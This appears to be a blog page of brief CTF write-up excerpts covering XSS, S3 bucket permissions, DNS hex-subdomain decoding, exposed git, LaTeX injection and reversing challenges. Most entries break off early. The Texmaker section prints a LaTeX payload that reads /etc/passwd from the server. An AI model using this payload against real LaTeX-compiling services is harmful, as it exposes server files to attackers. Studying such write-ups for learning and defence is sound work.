SEC-T CTF Admin I & II — Web 100 & 200

I’ve been out of practice for CTFs as of late, but SEC-T just ran a short but fun CTF that had a number of quick problems which I thoroughly enjoyed. Here I will focus on Admin I & II, both XSS problems created by Mathias Karlsson.

Admin I — Web 100

Can you alert(1) this page (in firefox)?
Sure, I’ll take that challenge: the page asks if you can achieve an XSS of alert(1) and gives you a link with the injectable parameter (http://xss1.sect.ctf.rocks/?xss=stuff). The resulting script on the page looks like this:
<script>
dontrunthisscript();
var a = "stuff";
</script>

No matter what you inject to replace "stuff", you will find that the code will not run, since it attempts to call dontrunthisscript() first, which isn’t defined. Additionally, the "<" character was filtered out, so we couldn’t just make our own new <script> block :(

The console is mad at us for trying to run it :(

SEC-T CTF — iFile — Web 250

This was the third challenge I attempted in the great CTF run by @SEC_T_org. It dealt with an issue I’d been interested in for a while: overly permissive S3 buckets on Amazon AWS.
An issue seen in a number of S3/AWS configs is the “Any Authenticated AWS User” permission. It grants access not just to AWS users authenticated to your account but to any authenticated AWS user at all, i.e. anyone with an AWS account.

Internetwache CTF 2016 — Misc80–404 Flag not found

This one was pretty quick, but lots of fun. The initial file is a packet capture showing a number of attempted GETs and DNS queries. Looking at the subdomains, I noticed that they seem to be made up of hex values.

Sexy Hexy Subdomains
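One way to recover what such hex-looking subdomains carry, as an added example that is not from the original writeup: the query names below are constructed for illustration (they are not the challenge’s pcap data), and the decoder simply concatenates the hex labels in the order the queries were seen.

```python
import re

# Constructed DNS query names (not the challenge's data), in observed order.
# The leading label of each data-carrying query is a hex-encoded chunk.
SAMPLE_QUERIES = [
    "4e6f7468696e67.example.test",
    "20746f20736565.example.test",
    "www.example.test",
    "206865726521.example.test",
]

# A label is treated as hex-encoded data only if it is an even-length run of
# hex digits at least MIN_HEX_LEN long; the floor avoids flagging ordinary
# short labels that happen to be valid hex ("cafe", "beef").
MIN_HEX_LEN = 8
HEX_LABEL = re.compile(r"^[0-9a-fA-F]+$")


def is_hex_label(label):
    """True if the label looks like a hex-encoded byte string."""
    return (len(label) >= MIN_HEX_LEN
            and len(label) % 2 == 0
            and bool(HEX_LABEL.match(label)))


def hex_chunks(qname):
    """Return the hex-looking labels of one query name, leftmost first."""
    return [lbl for lbl in qname.rstrip(".").split(".") if is_hex_label(lbl)]


def decode_hex_queries(qnames):
    """Decode hex labels across a sequence of query names into one payload.

    Returns (payload_bytes, flagged) where flagged lists the query names
    that carried hex data, so an analyst can see which lookups were used.
    """
    payload = bytearray()
    flagged = []
    for qname in qnames:
        chunks = hex_chunks(qname)
        if not chunks:
            continue  # ordinary lookup, nothing encoded in it
        flagged.append(qname)
        for chunk in chunks:
            payload += bytes.fromhex(chunk)
    return bytes(payload), flagged


if __name__ == "__main__":
    data, used = decode_hex_queries(SAMPLE_QUERIES)
    print("queries carrying data:", used)
    print("decoded:", data.decode("utf-8", errors="replace"))
```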

Internetwache CTF 2016 — Web80–0ldsk00lBlog

Navigating to the challenge page shows a super plain, simple HTML blog post. There was not much to work on, but one of the blog posts happens to mention the owner’s use of git.

I suspect he doesn’t know how to use git well. I certainly don’t.

Internetwache CTF 2016 — Web90 — Texmaker

This problem was my favorite of those I tried. When first navigating to the challenge site you are presented with an input field whose contents are turned into LaTeX, which is then compiled into a PDF.
This paper discusses methods for exploiting LaTeX, including some sample code which could be used for reading files from the server:
\openin5=/etc/passwd
\def\readfile{%
    \read5 to \curline
    \ifeof5 \let\next=\relax
    \else \curline~\\
        \let\next=\readfile
    \fi
    \next} %
\ifeof5 Couldn't Read the File! %
\else \readfile \closein5
\fi

After generating and checking the PDF I got the following:
Sweet sweet local files

HackIM 2016 Forensics 200

This challenge was pretty fun; there were a couple of dead ends and tricks.
The first step was to take a look at the packets. You can quickly notice that a ton of files are being grabbed using Wget (seen in the user-agent below). These can be exported using Wireshark’s File -> Export Objects -> HTTP.

The request URI shows what to expect in the files you extract from the packets.

HackIM 2016 RE 100 - ZorroPub


So, I tried a couple of different things with this challenge before finally just scripting/brute-forcing my way through it.
Initially, while looking at the problem in Bokken (a cool GUI for radare2, a nice free alternative to IDA Pro), I found the addresses of all of the compares, which would allow me to bypass any sort of check on the inputs by setting breakpoints in GDB and appropriately setting the Zero Flag whenever the program does a comparison before a jump.

It didn't quite work :(

CSAW 2016 Reverse 100 -- Rock

When you first run rock you just get a blank prompt. Input a couple of characters and you get a couple of quotes from the talented Dwayne “The Rock” Johnson, and a message saying “Too short or too long” unless you guessed (or checked) the right length.

'derp' wasn't the flag :(